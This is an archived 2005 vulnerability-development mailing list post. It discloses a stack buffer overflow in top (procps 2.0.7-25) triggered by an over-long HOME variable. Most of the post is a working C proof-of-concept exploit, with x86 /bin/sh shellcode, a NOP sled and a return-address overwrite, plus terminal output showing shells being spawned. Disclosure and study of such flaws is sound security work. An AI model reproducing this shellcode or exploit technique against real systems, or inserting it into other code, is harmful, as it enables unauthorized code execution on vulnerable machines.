Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Vulnerability Development: top (procps-2.0.7-25) vulnerability

top (procps-2.0.7-25) vulnerability

From: WINNY THOMAS <winnymthomas_at_yahoo.com>
Date: Fri, 6 May 2005 21:30:19 -0700 (PDT)

While running top on a tool of mine to do a profiling
test the top command ran into a segmentation fault. I
could find two instance where the command could
misbehave
 
1. if you have junk data inside a
file .toprc in your home directory
2. if your environmental variable
HOME is set to a string that’s greater than 1024.
 
I managed to spawn a shell out of top command by
exploiting the second issue. If you compile and run
the exploit code which I am including in the mail body
you will get a shell. Incase you don’t you could pass
parameters to the program as follows to adjust the
offset.
The vulnerability detail is included in the code
comment
 
[winnythomas_at_r8 WinnyThomas]$ ./putshellcode 1001
sh-2.05b$ exit
exit
[winnythomas_at_r8 WinnyThomas]$ ./putshellcode 120
Illegal instruction
[winnythomas_at_r8 WinnyThomas]$ ./putshellcode 1010
sh-2.05b$ exit
exit
 
in most of the test I did on the vulnerable code I got
shell on my system without passing any parameter to
the program (that is the hardcoded offset of 1111 in
my program worked well on my system)
 
/*
 * Program: Proof of concept code for top exploit
 * Author: Winny Thomas, Nevis networks pune
 * Vulerability: in top.c the function get_options
uses strcpy to copy the value of the
 * environment variable HOME into a static buffer that
is allocated on the stack. hence
 * its possible to apply standard stack smashing
attack to overwrite the return address
 * on the stack and execute a code which is of the
attackers choice
 * NOTE: top is not setuid and hence the exploit wont
spawn a root shell.
 * Tested on Red Hat 8 with procps verion 2.0.7-25.
the problem has
 * been fixed in the latest versions
 *
 * This code is for educational purpose only and the
 * author shall not bear any responsibility for any
 * damage caused by using this code
 */
 
#include <stdio.h>
#include <stdlib.h>
 
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
 
char exploit_variable[1200];
 
long get_esp(void)
{
        __asm__("movl %esp, %eax");
}
 
int main(int argc, char *argv[])
{
        long stackp, retaddr;
        char SETENV[1250];
        long *ptr;
        int i, j, offset = 1111;
 
        if (argc > 1)
            offset = atoi(argv[1]);
 
        stackp = get_esp();
        retaddr = stackp - offset;
 
        ptr = exploit_variable;
        for (i = 0; i < 1200; i += 4)
            *ptr++ = retaddr;
 
        for (i = 0; i < 600; i++)
            exploit_variable[i] = '\x90';
 
        for (j = 0 ;j < strlen(shellcode); j++, i++)
            exploit_variable[i] = shellcode[j];
 
        sprintf(SETENV, "HOME=");
        strcat(SETENV, exploit_variable);
        putenv(SETENV);
        execl("/usr/bin/top", "top", (char *)0);
}
 

                
__________________________________
Do you Yahoo!?
Make Yahoo! your home page
http://www.yahoo.com/r/hs
Received on May 09 2005

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos